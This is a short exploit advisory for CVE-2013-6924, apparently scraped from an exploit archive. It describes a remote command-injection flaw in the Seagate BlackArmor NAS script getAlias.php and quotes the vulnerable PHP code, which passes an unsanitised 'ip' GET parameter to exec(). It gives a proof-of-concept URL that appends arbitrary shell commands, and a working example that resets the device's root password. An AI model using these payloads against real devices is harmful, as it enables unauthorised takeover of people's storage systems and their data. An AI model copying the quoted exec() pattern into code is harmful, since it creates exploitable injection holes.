65 lines
No EOL
1.1 KiB
Text
65 lines
No EOL
1.1 KiB
Text
# Exploit Title: Seagate BlackArmor NAS - Remote Command Execution
|
|
|
|
# Google Dork: N/A
|
|
|
|
# Date: 04-01-2014
|
|
|
|
# Exploit Author: Jeroen - IT Nerdbox
|
|
|
|
# Vendor Homepage: <http://www.seagate.com/> http://www.seagate.com/
|
|
|
|
# Software Link:
|
|
<http://www.seagate.com/support/downloads/item/banas-220-firmware-master-dl/
|
|
>
|
|
http://www.seagate.com/support/downloads/item/banas-220-firmware-master-dl/
|
|
|
|
# Version: sg2000-2000.1331
|
|
|
|
# Tested on: N/A
|
|
|
|
# CVE : CVE-2013-6924
|
|
|
|
#
|
|
|
|
## Description:
|
|
|
|
#
|
|
|
|
# The file getAlias.php located in /backupmgt has the following lines:
|
|
|
|
#
|
|
|
|
# $ipAddress = $_GET["ip";
|
|
|
|
# if ($ipAddress != "") {
|
|
|
|
# exec("grep -I $ipAddress $immedLogFile > aliasHistory.txt");
|
|
|
|
# ..
|
|
|
|
# ..
|
|
|
|
# }
|
|
|
|
#
|
|
|
|
# The GET parameter can easily be manipulated to execute commands on the
|
|
BlackArmor system.
|
|
|
|
#
|
|
|
|
## Proof of Concept:
|
|
|
|
#
|
|
|
|
# http(s)://<ip | host>/backupmgt/getAlias.php?ip=xx /etc/passwd; <your
|
|
command here>;
|
|
|
|
#
|
|
|
|
## Example to change the root password to 'mypassword':
|
|
|
|
#
|
|
|
|
# http(s)://<ip | host>/backupmgt/getAlias.php?ip=xx /etc/passwd; echo
|
|
'mypassword' | passwd --stdin; |